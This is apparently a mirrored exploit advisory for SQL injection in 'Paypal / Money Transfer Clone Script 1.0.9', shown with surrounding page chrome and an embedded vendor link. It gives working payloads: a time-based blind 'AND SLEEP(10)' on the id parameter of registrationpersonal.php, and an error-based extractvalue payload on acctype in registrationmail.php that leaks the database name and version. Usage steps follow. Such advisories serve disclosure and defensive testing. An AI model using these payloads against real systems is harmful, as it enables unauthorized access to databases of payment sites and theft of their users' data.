扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 |
# Exploit Title: Paypal / Money Transfer Clone Script 1.0.9 - SQL Injection # Dork: N/A # Date: 2018-02-10 # Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com # Vendor Homepage: <blockquote class="wp-embedded-content" data-secret="hCVNdUu6CQ"><a href="https://phpscriptsmall.com/product/paypal-money-transfer-clone/" target="_blank"rel="external nofollow" class="external" >Paypal / Money Transfer Clone Script</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; visibility: hidden;" title="“Paypal / Money Transfer Clone Script” — PHP Scripts Mall" src="https://phpscriptsmall.com/product/paypal-money-transfer-clone/embed/#?secret=hCVNdUu6CQ" data-secret="hCVNdUu6CQ" frameborder="0" marginmarginscrolling="no"></iframe> # Version: 1.0.9 # Category: Webapps # CVE: N/A # # # # # # Description: # The vulnerability allows an attacker to inject sql commands. # # # # # # Proof of Concept : SQLI : http://localhost/PATH/registrationpersonal.php?id=[SQL] # Parameter : id (GET) #Type: Type: AND/OR time-based blind #Title: MySQL >= 5.0.50 AND time-based blind #Payload: AND SLEEP(10) ######################################################### http://localhost/PATH/registrationmail.php?acctype=[SQL] # Parameter : acctype (GET) #Type : Error based #Title : MySQL >= 5.0 AND error based - Extractvalue (XPATH query) #Payload : 1' and extractvalue(1,/*!00000Concat(0x3a,database(),0x3a,0x3a,version())*/)%23 # Description: First inject payload into parameter and load URL . then fill all fields and click "continue". # You will have version and db_name in the next page . You can find all tables using XPATH query and see result in the next page . |
体验盒子
